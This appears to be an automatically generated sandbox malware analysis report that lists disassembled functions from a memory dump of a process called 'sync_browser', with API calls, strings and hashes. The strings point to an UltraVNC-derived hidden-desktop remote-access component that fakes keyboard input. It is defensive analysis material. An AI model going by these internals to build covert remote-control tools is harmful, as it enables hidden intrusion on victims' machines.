                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: gethostbynamesprintf
                                                                    • String ID: %d.$IP address unavailable
                                                                    • API String ID: 4032199589-2983120142
                                                                    • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                    • Instruction ID: 82da22f2658a57c894a093b5ca996ebf46ebe6c2c99c2617307560843477a804
                                                                    • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                    • Instruction Fuzzy Hash: 8A41F631618A8981D621CB25E84056EBBA8FB84BF4F504336EFAE83BD5DF3CD1568740
                                                                    Function 00007FF6DC0F08E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadCursorA.USER32 ref: 00007FF6DC0F0925
                                                                      • Part of subcall function 00007FF6DC0ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF6DC0ED95E
                                                                      • Part of subcall function 00007FF6DC0ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF6DC0ED9EB
                                                                      • Part of subcall function 00007FF6DC0ED930: LoadLibraryA.KERNEL32 ref: 00007FF6DC0EDA0D
                                                                      • Part of subcall function 00007FF6DC0ED930: GetProcAddress.KERNEL32 ref: 00007FF6DC0EDA30
                                                                      • Part of subcall function 00007FF6DC0ED930: LoadLibraryA.KERNEL32 ref: 00007FF6DC0EDA51
                                                                      • Part of subcall function 00007FF6DC0ED930: GetProcAddress.KERNEL32 ref: 00007FF6DC0EDA6D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                                    • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                                    • API String ID: 2513085289-3031267129
                                                                    • Opcode ID: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                    • Instruction ID: 92ce22b376deeb6093500fd9633033eac4dc3a80f6357974f5c315708c43718e
                                                                    • Opcode Fuzzy Hash: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                    • Instruction Fuzzy Hash: 67215C31618B9592E6188B60E9001EDA3A8FB84B90F544636DAAD97795DF3DE0768340
                                                                    Function 00007FF6DC12A130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopInputOpen
                                                                    • String ID: Default
                                                                    • API String ID: 601053899-753088835
                                                                    • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                    • Instruction ID: 701091b4238fb75b04a0b8ac7ea8498119d520a16fdd030a78c50da417677b57
                                                                    • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                    • Instruction Fuzzy Hash: 8C218135A1C69681E631DB11F8167FE63A9FB8A744F940032DA9D83794DF3CD02ACB00
                                                                    Function 00007FF6DC0CA830 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF6DC0CA8B0
                                                                    • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF6DC0CA89F
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastParametersSystem
                                                                    • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                                    • API String ID: 2777246624-1049114938
                                                                    • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                    • Instruction ID: 00d5346071f1cb410ed041c90eb6a4fcfa6442f74eb27b7cc71342d4b50c7814
                                                                    • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                    • Instruction Fuzzy Hash: 30218031A0CA8A86E714CF11F9406AD77A4FB88748F540136DA8E97B58DF3DE52BC700
                                                                    Function 00007FF6DC1102A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID: fake %d down$fake %d up
                                                                    • API String ID: 4278518827-2496597273
                                                                    • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                    • Instruction ID: e025ee1153daed24d0f63bb36f8bd778a3ef2cdd2c4fbf2e5c0e9fca0935cd17
                                                                    • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                    • Instruction Fuzzy Hash: 08012621F196E682F310872AA8401BD6BA6AFC8704F58C037D94E837A5CF3DD867C700
                                                                    Function 00007FF6DC0CA550 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                                    • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                                    • API String ID: 542764273-2415377678
                                                                    • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                    • Instruction ID: ae8ab1c9fcfcd97aff974a7fcf6bffbe7a046db825dd854d686b4adf0a4aeee2
                                                                    • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                    • Instruction Fuzzy Hash: 74013971A2855B92F6409B20E904ABD2364ABA4308F404133D80ED3661CE3DA23BC761
                                                                    Function 00007FF6DC12A220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30threadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessWindow$CurrentFindThread
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 1332243453-1071638575
                                                                    • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                    • Instruction ID: c09d9e8618630a825e500138a6b78e3678d3d1a4075131f4bfde426c6a2b3122
                                                                    • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                    • Instruction Fuzzy Hash: 22F05421B2C74582EB948B66BC5157DA2A4FF887C4F881037EA5E86754DF3CD5A7C700
                                                                    Function 00007FF6DC0E22C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 236COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF6DC0E2328
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    • free.LIBCMT ref: 00007FF6DC0E2564
                                                                    • free.LIBCMT ref: 00007FF6DC0E2617
                                                                      • Part of subcall function 00007FF6DC178BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C0A
                                                                      • Part of subcall function 00007FF6DC178BF4: _errno.LIBCMT ref: 00007FF6DC178C14
                                                                      • Part of subcall function 00007FF6DC178BF4: GetLastError.KERNEL32(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C1C
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6DC0E230B
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                                    • API String ID: 1063416079-2438250478
                                                                    • Opcode ID: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
                                                                    • Instruction ID: 7c8ff4ab2bf149b709d0dc1e9cd14bbb87acf487f451868174985f4d45261f6f
                                                                    • Opcode Fuzzy Hash: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
                                                                    • Instruction Fuzzy Hash: C0A17C26B04A9984EB50DB36C9542AD6764FB88FA8F144332DE2E97BE5DF39C456C300
                                                                    Function 00007FF6DC0EA580 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • i, xrefs: 00007FF6DC0EA754
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF6DC0EA5D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                                    • API String ID: 3168844106-2727237473
                                                                    • Opcode ID: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                    • Instruction ID: b150ef84ba982d66b6b692aec19ca27404528ac1389d4a567e52db77a5f75961
                                                                    • Opcode Fuzzy Hash: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                    • Instruction Fuzzy Hash: B161E1627087C995E7258B25D8043BE6BA8FB8A794F144236DA9DC37C1CF3DD5A6C700
                                                                    Function 00007FF6DC188704 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
                                                                    • String ID:
                                                                    • API String ID: 3786353176-0
                                                                    • Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                    • Instruction ID: f1660805a8df4b93924b9499c435998044ee2bc6e72ec2cd9329b62469f3dbf9
                                                                    • Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                    • Instruction Fuzzy Hash: 07417936A1CA9A82FB108B19E94473C63A9FF54B84F144637CA4D877A1DF3CE8228744
                                                                    Function 00007FF6DC0CC590 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF6DC0CC5D4
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$AllocHeap_callnewhmalloc
                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                                    • API String ID: 908589684-1814909704
                                                                    • Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                    • Instruction ID: c4d32a3f4e64d5499eefb1588c5f3acc2183edcc5df9994816aceda4c319c3cd
                                                                    • Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                    • Instruction Fuzzy Hash: 5C21C932B087994ADB10CB69E94022CB799E784390F081233EBAC8BBC1DE3AD013C710
